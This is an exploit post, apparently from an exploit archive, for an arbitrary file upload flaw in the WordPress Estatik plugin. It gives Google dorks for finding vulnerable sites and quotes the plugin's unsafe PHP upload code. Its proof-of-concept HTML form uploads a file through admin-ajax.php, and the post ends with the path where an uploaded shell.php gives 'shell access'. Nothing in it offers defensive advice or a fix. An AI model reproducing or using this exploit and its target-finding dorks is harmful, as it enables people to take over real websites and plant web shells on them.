Exploit wordpress Estatik plugins

1. <!--
2.  
3.  
4.     \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
5.      \ \ / /| | '__| | | / __|\  /| | | |_  /
6.       \ V / | | |  | |_| \__ \/  \| |_| |/ /
7.        \_/  |_|_|   \__,_|___/_/\_\____//___|
8.        
9.                                               -->
10. #########################################################                          
11. #Exploit Title: Arbitrary File Upload Vulnerability in Estatik
12. #Category: webapps
13. #Google Dork : inurl:/wp-content/plugins/estatik/
14.              : index of "/wp-content/plugins/estatik/"
15. #########################################################
16.  
17. [+] In that function the following code saves an uploaded file sent with a request to the AJAX function:
18.  
19. $image_name = time()."_".$_FILES['es_media_images']['name'][$i];
20.  
21. $sourcePath = $_FILES['es_media_images']['tmp_name'][$i];  
22.  
23. $targetPath = $upload_dir['path']."/".$image_name;
24.  
25. move_uploaded_file($sourcePath,$targetPath) ;
26.  
27. [+] Proof of Concept:
28.  
29. The following proof of concept will upload the selected file and put it in the current
30. month’s directory inside of the /wp-content/uploads/ directory.
31. The name of the file in the upload directory with be the time the file
32. was saved as output by the function time() followed by a “_”
33. and then name of the as it was uploaded.
34.  
35. Make sure to replace “[path to WordPress]” with the location of WordPress.
36.  
37. <html>
38. <body>
39. <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
40. <input type="hidden" name="action" value="es_prop_media_images" />
41. <input type="file" name="es_media_images[]" />
42. <input type="submit" value="Submit" />
43. </form>
44. </body>
45. </html>
46.  
47. [+]shell access:
48.  
49. http://www.Target.com/wp-content/uploads/time/shell.php
50.  
51. Video
52. https://youtu.be/G80_JRsuY88
53. Bye..
54. Algerien Hacker